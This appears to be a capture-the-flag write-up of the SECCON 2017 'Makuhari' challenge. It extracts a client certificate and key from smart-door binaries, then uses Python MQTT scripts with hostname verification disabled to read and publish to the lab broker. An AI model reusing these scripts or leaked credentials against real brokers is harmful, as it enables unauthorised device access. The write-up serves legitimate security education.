@you0708
Last active March 1, 2018 13:33
SECCON 2017 Final Competition (Domestic) Write-up

Makuhari (幕張)

This write-up describes the Makuhari (幕張) challenge given at the SECCON 2017 final competition for domestic teams.

The challenge

The following two binaries were provided.

  • dooriccreaderapp_v1
    • 5ba48b4bb315b33250b812fb0deefdda5aac19d2db07d9bf26239215d4c51dfc
    • ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped
  • doorlockctlapp_v1
    • e65bf81d3c6ccc32407c7f9d63f3db8dd52307bb8decc39070cf8d0dd1240204
    • ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped

Analysis

Both binaries are written in Go and connect to an MQTT broker to control a smart door and an IC card reader.

# ./doorlockctlapp_v1 --help
Usage of ./doorlockctlapp_v1:
  -h string
    	MQTT broker address (default "makuhari.seccon")
  -p string
    	MQTT broker port (default "1883")
# ./dooriccreaderapp_v1 --help
Usage of ./dooriccreaderapp_v1:
  -h string
    	MQTT broker address (default "makuhari.koth.seccon")
  -i string
    	idm hex representation without hex prefix (default "000000000000")
  -p string
    	MQTT broker port (default "8883")

During the competition, makuhari.seccon did not exist, but makuhari.koth.seccon at 10.0.13.1 accepted MQTT connections over TLS.

First flag

Both executables contain the TLS certificate and key files used to connect to the MQTT broker. The first flag is located in the client certificate, as shown below.

$ openssl x509 -in client.crt -text
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 12132904043160716613 (0xa860bbf1c27ec545)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=JP, ST=Tokyo, L=Senjyu, O=SECCON, CN=secconfinaltrust
        Validity
            Not Before: Feb 17 00:08:17 2018 GMT
            Not After : Feb 17 00:08:17 2019 GMT
        Subject: C=JP, ST=Tokyo, L=Makuhari, O=Eag1eJum7, CN=debug.makuhari/emailAddress=SECCON{CLIENT_CERT_IS_C0MM0N_BY_DELIVERY_REAS0N}
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
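Because the certificate and key travel inside the shipped executables, the practical check is to scan release artifacts for PEM material before they leave the build. The scanner below is an added example, not code from the gist: it carves PEM blocks out of any file with the standard library only and reports whether private-key material is present. The file name pemscan.py and the SAMPLE bytes are constructed for illustration.

```python
"""Scan a file for embedded PEM certificates and private keys."""
import re
import sys

# A PEM block is a BEGIN line, a base64 body and the matching END line.
# The backreference forces the END label to equal the BEGIN label.
PEM_RE = re.compile(
    rb"-----BEGIN ([A-Z0-9 ]+)-----\r?\n"
    rb"([A-Za-z0-9+/=\r\n]+?)"
    rb"-----END \1-----"
)

# Labels that mean a secret was shipped, not merely a trust anchor.
SECRET_LABELS = {"PRIVATE KEY", "RSA PRIVATE KEY", "EC PRIVATE KEY"}


def carve_pem(blob):
    """Return [(label, pem_text), ...] for every PEM block found in blob."""
    return [(m.group(1).decode("ascii"), m.group(0).decode("ascii"))
            for m in PEM_RE.finditer(blob)]


def audit(blob):
    """Summarise embedded material: how many certs, how many private keys."""
    labels = [label for label, _ in carve_pem(blob)]
    return {
        "certificates": labels.count("CERTIFICATE"),
        "private_keys": sum(1 for l in labels if l in SECRET_LABELS),
        "labels": labels,
    }


# Constructed sample standing in for a statically linked binary: junk bytes
# around one fake certificate and one fake RSA key (bodies are not real DER).
SAMPLE = (
    b"\x7fELF\x00\x01\x02junk"
    b"-----BEGIN CERTIFICATE-----\nMIIBfake\nbody==\n-----END CERTIFICATE-----"
    b"\x00more junk\x00"
    b"-----BEGIN RSA PRIVATE KEY-----\nMIIEfake\n-----END RSA PRIVATE KEY-----"
)

if __name__ == "__main__":
    # Usage: python pemscan.py <binary>; with no argument the sample is scanned.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    report = audit(data)
    print(report)
    if report["private_keys"]:
        print("[!] private key material shipped in artifact")
```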

Second flag

The MQTT broker (makuhari.koth.seccon) published the flag periodically. We could see the flag by subscribing to the topic "mkhr/v/1/access/controller" (see makuhari_subscribe.py).

mkhr/v/1/access/controller: {"idm": "0114514810191900", "device-uuid": "1565a6cc-718a-4b35-ab5c-272b3ceadd17"}
mkhr/v/1/access/controller: {"idm":"000000000000","device-uuid":"80b5d612-4b5a-4f7a-986d-99532e206c7c","dt":1518848233}
mkhr/v/1/access/controller: {"warn": "DoorCtl firmware update is broken. DoorCtl firmware update is scheduled at 2018/02/17 15:00(JST)."}
mkhr/v/1/access/controller: {"second_flag": "SECCON{MQTT_1N_THE_W1LD}"}
mkhr/v/1/access/controller: {"idm": "0146581920292901", "device-uuid": "80b5d612-4b5a-4f7a-986d-99532e206c7c"}

Defence keyword

After the DoorCtl firmware update (announced in the MQTT message above), we saw the following message:

mkhr/v/1/access/controller: {"warn": "Submit your flag(json). \ttopic: mkhr/v/1/access/controller, 'devise-uuid':'door devise of outgoing no one else', 'idm':'closed person', 'flag':'your flag' "}

We got defence points by submitting our defence keyword (see makuhari_publish.py).

makuhari_publish.py

import paho.mqtt.client as mqtt
import ssl
import time

flag_file = '../flagword.txt'
host = '10.0.13.1'
port = 8883
# CA, client certificate and key extracted from the challenge binaries
ca_cert = 'ca.crt'
client_cert = 'client.crt'
client_key = 'private.key'
topic = 'mkhr/v/1/access/controller'
qos = 0


def on_connect(client, userdata, flags, respons_code):
    print('[*] status {0}'.format(respons_code))


def on_message(client, userdata, message):
    print('[*] {}: {}'.format(message.topic, str(message.payload)))


def main():
    while True:
        # read flagword (the last line of the file is used)
        with open(flag_file, 'r') as f:
            for line in f:
                flagword = line.strip()
        print('flagword: ' + flagword)
        client = mqtt.Client(protocol=mqtt.MQTTv311)
        client.username_pw_set('debug', password='')
        client.tls_set(ca_cert,
                       certfile=client_cert,
                       keyfile=client_key,
                       tls_version=ssl.PROTOCOL_TLSv1_2)
        # the broker is reached by IP, so hostname verification is disabled
        client.tls_insecure_set(True)
        ### callback functions
        client.on_connect = on_connect
        client.on_message = on_message
        client.connect(host, port=port, keepalive=60)
        message = '{"device-uuid":"no one else outgoing door", "idm":"closed person", "flag":"%s"}' % flagword
        client.publish(topic, message, qos)
        client.disconnect()
        time.sleep(60)


if __name__ == '__main__':
    main()

makuhari_subscribe.py

import paho.mqtt.client as mqtt
import ssl

host = '10.0.13.1'
port = 8883
# CA, client certificate and key extracted from the challenge binaries
ca_cert = 'ca.crt'
client_cert = 'client.crt'
client_key = 'client.key'
#topic = 'mkhr/v/1/unlock/door/1'
#topic = 'mkhr/v/1/access/controller'
topic = 'mkhr/v/1/#'  # wildcard: every topic under mkhr/v/1/
qos = 0


def on_connect(client, userdata, flags, respons_code):
    print('[*] status {0}'.format(respons_code))


def on_message(client, userdata, message):
    print('[*] {}: {}'.format(message.topic, str(message.payload)))


if __name__ == '__main__':
    client = mqtt.Client(protocol=mqtt.MQTTv311)
    client.tls_set(ca_cert,
                   certfile=client_cert,
                   keyfile=client_key,
                   tls_version=ssl.PROTOCOL_TLSv1_2)
    # the broker is reached by IP, so hostname verification is disabled
    client.tls_insecure_set(True)
    client.on_connect = on_connect
    client.on_message = on_message
    client.connect(host, port=port, keepalive=60)
    client.subscribe(topic, qos=qos)
    client.loop_forever()